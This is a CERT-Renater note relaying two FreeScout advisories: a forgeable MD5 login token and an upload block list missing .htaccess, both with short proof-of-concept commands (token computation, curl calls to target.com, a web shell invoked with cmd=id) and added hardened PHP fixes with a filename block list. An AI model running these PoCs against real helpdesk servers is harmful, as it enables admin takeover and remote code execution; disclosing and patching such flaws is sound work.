=====================================================================
CERT-Renater Information Note No. 2026/VULN229
_____________________________________________________________________

DATE : 27/02/2026
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running freescout (Composer) versions prior to 1.8.206.
=====================================================================

https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-6gcm-v8xf-j9v9
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-mw88-x7j3-74vc
_____________________________________________________________________

Predictable Authentication Token Enables Account Takeover
Severity: Critical
freescout-help-desk published GHSA-6gcm-v8xf-j9v9 on Feb 24, 2026

Package: freescout-helpdesk/freescout (Composer)
Affected versions: <= 1.8.205
Patched versions: 1.8.206

Description

Summary

FreeScout's TokenAuth middleware uses a predictable authentication token computed as MD5(user_id + created_at + APP_KEY). This token is static (never expires/rotates), and if an attacker obtains the APP_KEY — a well-documented and common exposure vector in Laravel applications — they can compute a valid token for any user, including the administrator, achieving full account takeover without any password.

Severity: Critical (CVSS 9.8)

Details

Affected File: app/Http/Middleware/TokenAuth.php (Lines 24-28)

The middleware authenticates users when:
- The request contains an auth_token query parameter
- The in_app cookie is present (trivially set by attacker)

    public function handle($request, Closure $next)
    {
        // Only runs for requests that carry no authenticated session.
        if (!$request->user() && !empty($request->auth_token) && $request->cookie('in_app')) {
            // The expected token is derived entirely from columns of the users table
            // plus APP_KEY, so anyone holding APP_KEY can compute it for any user id.
            $user = User::where(
                \DB::raw('md5(CONCAT(id, created_at, "'.config('app.key').'"))'),
                $request->auth_token
            )->first();
            if (!empty($user)) {
                \Auth::login($user);
            }
        }
        return $next($request);
    }

Critical weaknesses:
- Static token: Never expires, never rotates. Valid forever once computed.
- Deterministic: Derived from known/guessable values — user_id (sequential, admin=1), created_at (timestamp), and APP_KEY.
- No rate limiting: Unlimited authentication attempts.
- Trivial cookie: The in_app cookie is set by the attacker — zero security value.

Secondary: app/Attachment.php (Line 236) uses the same weak pattern:

    md5(config('app.key').$this->id.$this->size)

PoC

Prerequisites: A running FreeScout instance + knowledge of APP_KEY (obtainable via .env exposure, debug mode, backup leaks, git history, SSRF, etc.)

    # Step 1: Compute token for admin (user_id=1)
    APP_KEY="base64:YOUR_APP_KEY_HERE"
    CREATED_AT="2026-01-15 10:30:00"   # admin account creation timestamp
    TOKEN=$(echo -n "1${CREATED_AT}${APP_KEY}" | md5sum | cut -d' ' -f1)

    # Step 2: Authenticate as admin
    curl -b 'in_app=1' "https://target.com/conversations?auth_token=${TOKEN}"
    # Result: Full admin access — manage mailboxes, read all conversations, modify settings

In testing, token computation takes <1ms. The created_at timestamp can be narrowed via user enumeration or brute-forced (realistic window of days/weeks).

Impact

Full account takeover of any FreeScout user including administrators. An attacker gains:
- Access to all helpdesk conversations and customer data
- Ability to modify system settings and create new admin accounts
- Potential for further server compromise through admin functionality

This affects all FreeScout installations where the APP_KEY may be exposed through any common Laravel misconfiguration vector.
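The hardened counterpart to the middleware above, added here as an illustration (it is not FreeScout's code and not the fix shipped in 1.8.206): tokens are random rather than derived from user attributes and APP_KEY, are stored only as a SHA-256 digest, expire, and are single use. The in-memory $store array stands in for a database table, and every function and constant name is an assumption.

```php
<?php
// Added example, not FreeScout's code: an unguessable, short-lived, hashed-at-rest
// login token, shown as the contrast to the static md5(id . created_at . APP_KEY)
// scheme in GHSA-6gcm-v8xf-j9v9. The in-memory $store array stands in for a
// database table (assumption); every name below is illustrative.
declare(strict_types=1);

const TOKEN_TTL_SECONDS = 600; // assumption: a 10-minute lifetime

/**
 * Issue a token for $userId and return the plaintext to hand to the user.
 * Only the SHA-256 digest is stored, so a leaked table (or a leaked APP_KEY)
 * yields nothing that can be replayed; the token itself is 256 bits of CSPRNG
 * output and is not derived from any attribute of the user.
 */
function issueToken(array &$store, int $userId, int $now): string
{
    $token = bin2hex(random_bytes(32));
    $store[hash('sha256', $token)] = [
        'user_id'    => $userId,
        'expires_at' => $now + TOKEN_TTL_SECONDS,
        'used'       => false,
    ];
    return $token;
}

/**
 * Verify a presented token. The lookup is keyed by the digest of the presented
 * value, so any timing variation reveals at most something about the digest,
 * never the token. An expired or already-consumed record is rejected, and a
 * successful match burns the record (single use). Returns the user id, or null.
 */
function verifyToken(array &$store, string $presented, int $now): ?int
{
    if (!preg_match('/\A[0-9a-f]{64}\z/', $presented)) {
        return null; // malformed input: reject before touching the store
    }
    $digest = hash('sha256', $presented);
    if (!isset($store[$digest])) {
        return null;
    }
    $rec = $store[$digest];
    if ($rec['used'] || $now > $rec['expires_at']) {
        unset($store[$digest]); // stale or replayed: drop it
        return null;
    }
    $store[$digest]['used'] = true;
    return $rec['user_id'];
}

// Self-check of the properties the vulnerable middleware lacks: single use,
// expiry, and no acceptance of a guessed value.
$store = [];
$now   = time();

$t1 = issueToken($store, 1, $now);
if (verifyToken($store, $t1, $now) !== 1) {
    throw new RuntimeException('a fresh token must authenticate its user');
}
if (verifyToken($store, $t1, $now) !== null) {
    throw new RuntimeException('a consumed token must not be accepted again');
}

$t2 = issueToken($store, 1, $now);
if (verifyToken($store, $t2, $now + TOKEN_TTL_SECONDS + 1) !== null) {
    throw new RuntimeException('an expired token must be rejected');
}

if (verifyToken($store, str_repeat('0', 64), $now) !== null) {
    throw new RuntimeException('a guessed value must not match');
}
echo "token checks passed\n";
```

In a Laravel deployment the route that consumes such a token should also sit behind the framework's throttle middleware, which addresses the "no rate limiting" weakness listed above; the in_app cookie should carry no authentication meaning at all.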
Severity: Critical, 9.8 / 10

CVSS v3 base metrics
  Attack vector: Network
  Attack complexity: Low
  Privileges required: None
  User interaction: None
  Scope: Unchanged
  Confidentiality: High
  Integrity: High
  Availability: High
  Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2026-27637
Weaknesses: CWE-330
Credits: @Offensive-AI (Offensive-AI), Reporter
_____________________________________________________________________

Missing .htaccess in Restricted File Extensions Allows Remote Code Execution on Apache
Severity: High
freescout-help-desk published GHSA-mw88-x7j3-74vc on Feb 24, 2026

Package: freescout-helpdesk/freescout (Composer)
Affected versions: <= 1.8.205
Patched versions: 1.8.206

Description

Summary

FreeScout's file upload restriction list in app/Misc/Helper.php does not include .htaccess or .user.ini files. On Apache servers with AllowOverride All (a common configuration), an authenticated user can upload a .htaccess file to redefine how files are processed, enabling Remote Code Execution.

Severity: High (CVSS 8.8)

Details

Affected File: app/Misc/Helper.php (Lines 62-68)

The restricted extensions list:

    public static $restricted_extensions = [
        'php', 'php3', 'php4', 'php5', 'pht', 'exe', 'bat', 'cmd', 'com',
        'vbs', 'vbe', 'js', 'jse', 'wsf', 'wsh', 'msc',
    ];

Missing critical extensions:
- .htaccess — Apache configuration override
- .user.ini — PHP per-directory configuration
- .phtml, .phar — PHP executable extensions

PoC

Prerequisites: Authenticated user (any role) on a FreeScout instance running on Apache with AllowOverride All.

    # Step 1: Upload .htaccess via conversation reply attachment
    # File content: AddType application/x-httpd-php .txt

    # Step 2: Upload a .txt file containing PHP code

    # Step 3: Access the .txt file directly
    curl "https://target.com/storage/app/attachment/1/shell.txt?cmd=id"
    # Result: uid=33(www-data) gid=33(www-data)

Verified: Upload of .htaccess file returns {"status":"success"} with no restriction.
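A filename policy that closes the gaps listed above, added here as an illustration (it is not FreeScout's code and not the change shipped in 1.8.206): it refuses the names the advisory says are missing (.htaccess, .user.ini, .phtml, .phar) and goes beyond them to dotfiles in general, case variants, trailing dots and multi-extension names. Function and constant names are assumptions, and web.config is included on the assumption that some deployments run on IIS.

```php
<?php
// Added example, not FreeScout's code: an attachment filename policy that
// refuses server-configuration and executable names, covering what
// GHSA-mw88-x7j3-74vc lists as missing (.htaccess, .user.ini, .phtml, .phar)
// and going beyond it to case variants, multi-extension names and dotfiles in
// general. Function and constant names are illustrative.
declare(strict_types=1);

// Names that are dangerous whatever their "extension": per-directory config
// files for Apache and PHP (web.config added on the assumption of IIS hosting).
const BLOCKED_NAMES = ['.htaccess', '.htpasswd', '.user.ini', 'web.config'];

// The advisory's list plus the extensions it says are missing, plus other
// names the PHP handler is commonly mapped to on Apache.
const BLOCKED_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'pht', 'phtml', 'phar', 'phps',
    'exe', 'bat', 'cmd', 'com', 'vbs', 'vbe', 'js', 'jse', 'wsf', 'wsh', 'msc',
];

/**
 * True only if $name is acceptable as a stored attachment filename.
 */
function isSafeAttachmentName(string $name): bool
{
    // Reduce to a bare filename: path components and NUL bytes are never legitimate here.
    $base = basename(str_replace('\\', '/', $name));
    if ($base === '' || $base === '.' || $base === '..' || strpos($base, "\0") !== false) {
        return false;
    }
    // Normalise case and strip trailing dots/spaces, which some filesystems discard
    // (so "shell.php." would otherwise be stored as "shell.php").
    $lower = rtrim(strtolower($base), ". ");
    if ($lower === '' || $lower[0] === '.') {
        return false; // no dotfiles at all; this alone covers .htaccess and .user.ini
    }
    if (in_array($lower, BLOCKED_NAMES, true)) {
        return false;
    }
    // Test every extension component, not just the last one: Apache's mod_mime can
    // apply a handler for any of them, so "shell.php.txt" is as dangerous as "shell.php".
    $parts = explode('.', $lower);
    array_shift($parts); // the stem is not an extension
    foreach ($parts as $ext) {
        if (in_array(trim($ext), BLOCKED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

// Self-check against the names from the advisory and a few variants.
$expectations = [
    'invoice.pdf'     => true,
    'photo.JPG'       => true,
    'notes.txt'       => true,
    '.htaccess'       => false,
    '.user.ini'       => false,
    'shell.phtml'     => false,
    'archive.phar'    => false,
    'shell.PHP'       => false,
    'shell.php.txt'   => false,
    'shell.php.'      => false,
    '../../.htaccess' => false,
];
foreach ($expectations as $name => $expected) {
    if (isSafeAttachmentName($name) !== $expected) {
        throw new RuntimeException("unexpected verdict for {$name}");
    }
}
echo "filename checks passed\n";
```

A name filter is the application-side half; the server-side half removes the prerequisite the advisory names: serve the attachment directory with AllowOverride None so an uploaded .htaccess is never read, and disable PHP for that directory (php_admin_flag engine off under mod_php, or leave the directory out of the PHP handler mapping under PHP-FPM), so that even a file Apache types as PHP is returned as bytes rather than executed.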
Impact

Remote Code Execution on Apache-based FreeScout deployments. An authenticated attacker (any user role, including agents) can:
- Execute arbitrary system commands on the server
- Read/write files on the filesystem
- Pivot to other services and internal networks
- Exfiltrate all data including database credentials

This is especially critical when combined with the TokenAuth bypass (GHSA-6gcm-v8xf-j9v9), which allows unauthenticated attackers to first gain admin access and then achieve RCE.

Severity: High, 8.8 / 10

CVSS v3 base metrics
  Attack vector: Network
  Attack complexity: Low
  Privileges required: Low
  User interaction: None
  Scope: Unchanged
  Confidentiality: High
  Integrity: High
  Availability: High
  Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2026-27636
Weaknesses: CWE-434
Credits: @Offensive-AI (Offensive-AI), Reporter

=========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44            +
+ 23/25 Rue Daviel      | fax : 01-53-94-20-41            +
+ 75013 Paris           | email: cert@support.renater.fr  +
=========================================================